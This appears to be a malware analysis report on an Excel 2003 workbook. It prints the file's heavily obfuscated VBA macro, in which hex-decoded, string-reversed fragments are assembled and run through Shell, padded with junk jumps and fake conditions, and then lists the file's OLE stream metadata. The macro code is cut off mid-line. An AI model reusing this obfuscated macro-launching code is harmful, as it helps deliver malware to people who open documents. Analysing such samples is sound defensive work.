StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))

BlokE5 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A373D3A3E483D3E"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3635"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))))))))

BlokE51 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3334373938383743"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))))), StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("3737"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))))))

BlokE52 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D374A3B3937383738"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))), StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))))))))

BlokE53 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("404B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))))), StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A3B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))))

BlokE54 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A3E3E393D49"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))

BlokE55 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("403F404B3F4E3F3E3C39"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3635"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))))))))

BlokE56 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D")))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))

BlokE57 = QhnsRALDv(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))

BlokE6 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3D4A3C483E3D3E4D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))), StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("373B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))))

BlokE61 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3E493D3A3F383F393B3C3E3F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3635"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))))))))

BlokE = BlokE1 + BlokE2 + BlokE3 + BlokE4 + BlokE5 + BlokE51 + BlokE52 + BlokE53 + BlokE53 + BlokE53 + BlokE54 + BlokE55 + BlokE56 + BlokE1 + BlokE57 + BlokE6 + BlokE61

Shell (BlokE)

End Sub

Public Function DZfiJRzM5(ByVal yvofgTHeW As String)

Dim DIzYhzYcE As Long, MSghprinR As String, ZxeIxq7Eb As String

On Local Error Resume Next

For DIzYhzYcE = 1 To Len(yvofgTHeW) Step 2

If 608372102 = 608372102 + 1 Then End

Dim W8UH7XTHD As Double

If 383584756 = 383584756 + 1 Then End

Dim HtUqpRQDHgHSMebwUs As Single

GoTo pFwhQSmPUheNaAAbjv

pFwhQSmPUheNaAAbjv:

GoTo uRBLRNZqFMOYvqTVCI:

NsFEUZbSsHzkRToQV:

YSwyfzEMCiqrpuRZgJ = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("456D5D556E4D74775970"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))

GoTo gOcBBdmyauZx

QxssrwhahL:

GoTo CxbdJPjrgLH

GoTo YorumKoSCynH

qRbnOjNmEPEBv:

racwZerBQkYJlHGiPh = "QxQjdvsOk"

GoTo KiRcieqGHdfoLtVmSZApUQQPUFyFkKw

xIapKxHfaDFlFLSoxywBZfmQedtwzrQf:

OLuHhhIQeFaEduU:

GoTo IqsMpuHEnAaaBJQySxVnoztLuRBLRNZqFMOYvq

JgtHpGswVKH:

AcyKZGYJNncZSliFbz:

GoTo TQnJiokvzNjkuDy

FtrlDAQGRYTfwxTeBiLbHOhpfKFGEJuov:

EbKVbYjABQYhFmPfLR = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46727B667B744B50514C766C"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))

GoTo AlBFIzZBhQMAVLCQbJJw

dfzchuFanbMoKJ:

racwZerBQkYJlHGiPh = "QxQjdvsOk"

GoTo SkVaAbmgyvRo

tDJFRijEGPnUxNuAT:

KGSkyGHQojMOvBUdSy = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("4777727274517C6D7977"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))

GoTo QxssrwhahL

sYsLGvbklj:

GFtgGdpElCptSGEyQNkG = "lhvKghr"

GoTo ZRZDQPgkmeDSK

hEayqnyPeznw:

nMpTRzoIzqDNxwkkL = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7A744E7C6A7C674C6B4D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))

GoTo OsubvAIyennmqNUcGSS

IFcyQOKQoCYLU:

GoTo MRaPvEEDIgmtYl

GoTo nQSzTZhQCLLJOm

HIScQAPjDVQG:

KGSkyGHQojMOvBUdSy = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("4777727274517C6D7977"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))

GoTo uvtykdkObaqu

SMTxZJaegYx:

GjnBxguTTuDPsLrO = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("507A4A746D784C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))

GoTo EplZukbpzi

oAdwcAReRPJZvfqwsDUVr:

GoTo ADGyQmfPxzTw

GoTo CaGkzgmFNDjefd

VCIckZEAAzDpvCTutJz:

GoTo GASBYHSZUgxMTV

GoTo uSwbZGvPTKZjRQEE

rDRzQCGhURLebyTsyuGYtvEOJnCUpICsYhhg:

GoTo jssryhahMYYnrumLaT

GoTo VOVANMdgjbzOracwZerBQkYJlHGiP

EAMdsNBKidGIpIOQLr:

zrQfYIqsMpuHEnAaa = "JQySxVNozt"

GoTo kZEAAzDpvC

CaGkzgmFNDjefd:

qiGVOyhjDgly:

GoTo SMTxZJaegYx

VOVANMdgjbzOracwZerBQkYJlHGiP:

jssryhahMYYnrumLaT:

GoTo SQxQjdvsOkI

YorumKoSCynH:

ADGyQmfPxzTw:

GoTo pCMvvjUwSftbsei

UHiERgMfQUugaspLiGMITQ:

oonsdVdHUTk:

GoTo HIScQAPjDVQG

utJzCuSwbZGvPFwKUDD:

BxIapKxHfaDFlFLSIox = "wBZfmQdt"

GoTo qRbnOjNmEPEBv

wtnFDavTaVilzVQgq:

GoTo OLuHhhIQeFaEduU

GoTo OewQkeTzIJHMqxcpoEHKCcqjTBDAFSdyLzlMjiJrQIMmMYR

nQSzTZhQCLLJOm:

erfQsONpQoaeEepjB:

GoTo NsFEUZbSsHzkRToQV

mwffRStCOrKpNgsgdQpm:

GASBYHSZUgxMTV:

GoTo tDJFRijEGPnUxNuAT

mphFUNxfiCf:

CxbdJPjrgLH:

GoTo xudqPPrzLoHndCdoiAkGqBGDOguCD

If 188710483 = 188710483 + 1 Then End

Dim tVcjObaqtvoNcVFnpK As Single

GoTo YrXyNnOZTlUqalrnQf

YrXyNnOZTlUqalrnQf:

uSwbZGvPTKZjRQEE:

MRaPvEEDIgmtYl:

GoTo oAdwcAReRPJZvfqwsDUVr

eVuYCAiQrh:

GoTo BNQfACLVQtJcwPJz

GoTo mwffRStCOrKpNgsgdQpm

AlBFIzZBhQMAVLCQbJJw:

GoTo AcyKZGYJNncZSliFbz

GoTo JgtHpGswVKH

lgIKrxQZOupqotelsI:

GoTo FKwCJbBAQGJBaDigN

GoTo jzprjIlPNwkFmAKttggHPdEYDc

pPbUnVtdntpBRhoqzQ:

JLDdFkUPEZPGTfNM:

GoTo vxekDLAgccbgQQfvVUl

OewQkeTzIJHMqxcpoEHKCcqjTBDAFSdyLzlMjiJrQIMmMYR:

BNQfACLVQtJcwPJz:

GoTo hEayqnyPeznw

oNdVFnqKnrFPky:

VrPIEPhvQEOmhKL:

GoTo YyUTwevhlKlw

xudqPPrzLoHndCdoiAkGqBGDOguCD:

If 768026680 = 768026680 + 1 Then End

Dim fClKQMYoELNWtoSUBH As Double

GoTo mnwVQtybiCKeaaYdPV

mnwVQtybiCKeaaYdPV:

nMpTRzoIzqDNxwkkL = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7A744E7C6A7C674C6B4D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))

GoTo lgIKrxQZOupqotelsI

vxekDLAgccbgQQfvVUl:

EbKVbYjABQYhFmPfLR = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46727B667B744B50514C766C"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))

GoTo eVuYCAiQrh

pCMvvjUwSftbsei:

YSwyfzEMCiqrpuRZgJ = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("456D5D556E4D74775970"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))

GoTo wtnFDavTaVilzVQgq

IqsMpuHEnAaaBJQySxVnoztLuRBLRNZqFMOYvq:

GjnBxguTTuDPsLrO = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("507A4A746D784C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))

GoTo VCIckZEAAzDpvCTutJz

OsubvAIyennmqNUcGSS:

GoTo oonsdVdHUTk

GoTo mphFUNxfiCf

KiRcieqGHdfoLtVmSZApUQQPUFyFkKw:

vZoHcupeJSTRQHBImz = "OSVMmB"

GoTo PSKjMrbQLgQMblTTGt

ZRZDQPgkmeDSK:

vZoHcupeJSTRQHBImz = "OSVMmB"

GoTo dfzchuFanbMoKJ

EplZukbpzi:

GoTo erfQsONpQoaeEepjB

GoTo UHiERgMfQUugaspLiGMITQ

uvtykdkObaqu:

GoTo qiGVOyhjDgly

GoTo oNdVFnqKnrFPky

PSKjMrbQLgQMblTTGt:

GFtgGdpElCptSGEyQNkG = "lhvKghr"

GoTo rDRzQCGhURLebyTsyuGYtvEOJnCUpICsYhhg

uRBLRNZqFMOYvqTVCI:

zrQfYIqsMpuHEnAaa = "JQySxVNozt"

GoTo utJzCuSwbZGvPFwKUDD

jzprjIlPNwkFmAKttggHPdEYDc:

FKwCJbBAQGJBaDigN:

GoTo FtrlDAQGRYTfwxTeBiLbHOhpfKFGEJuov

SkVaAbmgyvRo:

BxIapKxHfaDFlFLSIox = "wBZfmQdt"

GoTo EAMdsNBKidGIpIOQLr

TQnJiokvzNjkuDy:

GoTo sYsLGvbklj

gOcBBdmyauZx:

GoTo VrPIEPhvQEOmhKL

GoTo pPbUnVtdntpBRhoqzQ

YyUTwevhlKlw:

MSghprinR = MSghprinR & Chr$(Val(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("2E50"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38")))))))))))))))))) & Mid$(yvofgTHeW, DIzYhzYcE, 2)))

GoTo IFcyQOKQoCYLU

SQxQjdvsOkI:

GoTo JLDdFkUPEZPGTfNM:

GoTo xIapKxHfaDFlFLSoxywBZfmQedtwzrQf

kZEAAzDpvC:

Next DIzYhzYcE

If 815340844 = 815340844 + 1 Then End

Dim esnFah2BQ As Single

If 588073541 = 588073541 + 1 Then End

Dim iMHCVdTMIIHMvpvbCn As Boolean

GoTo VFQVSduyRSbAgKZGMf

VFQVSduyRSbAgKZGMf:

GoTo wAOKtHhhHQdFZEcuTuF:

QxPBFfFQKdawS:

NrGntMUKqlm:

GoTo jfrHQsgpMHlnT

BrQfgejGNUzLLb:

euJfSczuYaGbgoeJRSQV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("54577D6D754A5E56825B76824A51"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))

GoTo iZyNGqYbvYc

knfDhLvrgAq:

wcQYVbLELqQCSQZQqS = "idRmdTsba"

GoTo vFoobNpLYmT

ihxADvTjcLuwQtyLVrEeFcbCkBnrRrCw:

GoTo CmxCzKcdyzI

GoTo LjEdVRduIeRczuYZFa

RduIeRczuYZFafndIRRQ:

LwsgAriwGpo:

GoTo szGlyxNQTLkzscKMhJOc

jfrHQsgpMHlnT:

DZfiJRzM5 = MSghprinR

GoTo tBrQfgejGNUzL

CyKbcxzIgMqGntUJpllkoaSaEfQhknfD:

GoTo LwsgAriwGpo

GoTo LvrgAqhvFooNpLYmTlQbA

eIGodxofsDmlZZA:

euJfSczuYaGbgoeJRSQV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("54577D6D754A5E56825B76824A51"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))

GoTo UxQwTmymkewtPzKPMpqLMVubETAGaiYDyzxCn

VdwEtZUUSYJPQ:

xNOkmvSzdtagzHwc = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46567454484F644F5B53"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))

GoTo ONeTQOnQvtbPkQfpYYKKmuH

CAuMJgCbhdorGcdnwrkDYqlaFOPNSDxEivuKOR:

If 14014502 = 14014502 + 1 Then End

Dim iuJqItwYMJDVSDZwEA As Currency

GoTo ndJEFDIsltXjAEGwXA

ndJEFDIsltXjAEGwXA:

CLVQtJcwPJzfoonsdV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6B6D527C4A59746C6E714B58"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))

GoTo ixpaHJfHLakESFsSp

VhbtdzjuzvHZnv:

glyIerfQsONpQoaeEe = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6E5F734F595681"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrRever

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375193
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	244
Entropy:	2.88943059278
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	200
Entropy:	3.21284618118
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . m . t . . . . . . . . . . . .
